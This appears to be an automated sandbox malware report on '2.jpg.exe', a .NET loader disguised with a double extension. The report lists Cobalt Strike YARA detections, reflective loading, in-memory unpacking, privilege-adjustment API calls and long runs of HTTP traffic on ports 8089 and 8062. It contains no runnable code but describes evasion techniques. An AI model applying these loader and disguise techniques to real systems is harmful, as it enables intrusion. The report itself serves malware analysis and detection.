Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: 2.jpg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.2.jpg.exe.5f20000.1.raw.unpack, AAAABBB.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.2.jpg.exe.26c6810.0.raw.unpack, AAAABBB.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@0/1

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06763751 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_06763751

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06768FCB _memset,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,CloseHandle,CloseHandle,OpenProcess,ProcessIdToSessionId,CloseHandle,Process32Next,CloseHandle,

0_2_06768FCB

Source: C:\Users\user\Desktop\2.jpg.exe

File created: C:\Users\user\Desktop\localfile_638491169974164363.txt

Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe

Mutant created: NULL

Source: 2.jpg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2.jpg.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\2.jpg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2.jpg.exe	ReversingLabs: Detection: 18%
Source: 2.jpg.exe	Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: wininetlui.dll	Jump to behavior
Source: C:\Users\user\Desktop\2.jpg.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\2.jpg.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 2.jpg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 2.jpg.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 2.jpg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressedGsystem.diagnostics.diagnosticsourceucostura.system.diagnostics.diagnosticsource.dll.compressed@ source: 2.jpg.exe
Source:	Binary string: rget_download0get_FTPURL1Task`1Resource1kernel32Win32Dictionary`2Int64<Module>LoadByDFSystem.IOCosturacostura.metadatamscorlibget_abcSystem.Collections.GenericCopyToAsyncGetAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedGetMethodCreateInstancesourceEnsureSuccessStatusCodeCompressionModeHttpResponseMessageExchangenullCacheInvokeIDisposableGetModuleHandleRuntimeTypeHandleGetTypeFromHandleDownloadFilehModuleget_NameprocNamelpModuleNamefullNameGetNamerequestedAssemblyNamenameDateTimeget_DeclaringTypeGetTypeget_Cultureset_CultureresourceCulturecultureMethodBaseDisposeCreateEditorBrowsableStateDeleteWriteCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteTryGetValuevalueadd_AssemblyResolveLoadByDF.exedwSizeSystem.ThreadingSystem.Runtime.VersioningFromBase64StringCultureToStringGetStringAttachlocalFilePathget_LengthEndsWithnullCacheLockTaskSystem.ComponentModelkernel32.dllfileUrlReadStreamLoadStreamGetManifestResourceStreamFileStreamDeflateStreamMemoryStreamstreamProgramset_ItemSystemresourceManMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.Reflectionset_PositionStringComparisonCopyToMethodInfoget_CultureInfoMemberInfoSystem.Net.HttpAssemblyLoadersenderget_ResourceManagerResolveEventHandlerSystem.CodeDom.CompilerEnterActivator.ctor.cctorMonitorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesReadFromEmbeddedResourcesLoadByDF.Resource1.resourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesget_FlagsAssemblyNameFlagsResolveEventArgsargsget_TicksSystem.Threading.TasksEqualsGetProcAddresslpAddressConcatFormatObjectlpflOldProtectVirtualProtectflNewProtectWaitExitget_ResultToLowerInvariantHttpClientget_ContentHttpContentConvertReadAllTextget_NowLoadByDF_ProcessedByFodyContainsKeyget_AssemblyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmpty#localfile_{0}.txt source: 2.jpg.exe
Source:	Binary string: costura.costura.pdb.compressed source: 2.jpg.exe
Source:	Binary string: C:\Users\miss\source\repos\ByDll\obj\Release\ByDll.pdb source: 2.jpg.exe, 00000000.00000002.4124836777.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, 2.jpg.exe, 00000000.00000002.4125783535.0000000005F20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6F8FE76A0D5297A4FA7D4F7054093411D51F71B1\|2636 source: 2.jpg.exe
Source:	Binary string: C:\Users\miss\source\repos\LoadByDF\obj\x86\Release\LoadByDF.pdb source: 2.jpg.exe

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\2.jpg.exe

Unpacked PE file: 0.2.2.jpg.exe.6760000.2.unpack

Yara detected ReflectiveLoader

Source: Yara match	File source: 0.2.2.jpg.exe.6760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2.jpg.exe.6760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR

.NET source code contains potential unpacker

Source: 2.jpg.exe, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: 2.jpg.exe, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 2.jpg.exe, Program.cs	.Net Code: Main

Yara detected Costura Assembly Loader

Source: Yara match	File source: 2.jpg.exe, type: SAMPLE
Source: Yara match	File source: 0.0.2.jpg.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1672509121.0000000000292000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2.jpg.exe PID: 7272, type: MEMORYSTR

Source: 2.jpg.exe

Static PE information: 0xB1D24656 [Tue Jul 15 11:43:18 2064 UTC]

Source: C:\Users\user\Desktop\2.jpg.exe

Code function: 0_2_06761FAA GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_06761FAA

Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06778221 push ecx; ret	0_2_06778234
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06789B73 push 0000006Ah; retf	0_2_06789BE4
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06789B75 push 0000006Ah; retf	0_2_06789BE4
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0677C35C push 940677C3h; ret	0_2_0677C361
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0679031E push esi; iretd	0_2_0679031F
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06789B0B push 0000006Ah; retf	0_2_06789BE4
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_05F300B5 push 00000022h; retn F013h	0_2_05F30226
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_05F3016B push 00000022h; retn F013h	0_2_05F30226
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0637765E push ecx; ret	0_2_06377671
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0637B799 push 941001C3h; ret	0_2_0637B79E
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_0637582D push dword ptr [ecx-75h]; iretd	0_2_06375835
Source: C:\Users\user\Desktop\2.jpg.exe	Code function: 0_2_06374101 push edi; ret	0_2_06374102

Source: 2.jpg.exe

Static PE information: section name: .text entropy: 7.64504625754152

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: jpg.exe

Static PE information: 2.jpg.exe

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8089
Source: unknown	Network traffic detected: HTTP traffic on port 8089 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 8089
Source: unknown	Network traffic detected: HTTP traffic on port 8089 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 8062
Source: unknown	Network traffic detected: HTTP traffic on port 8062 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 8062
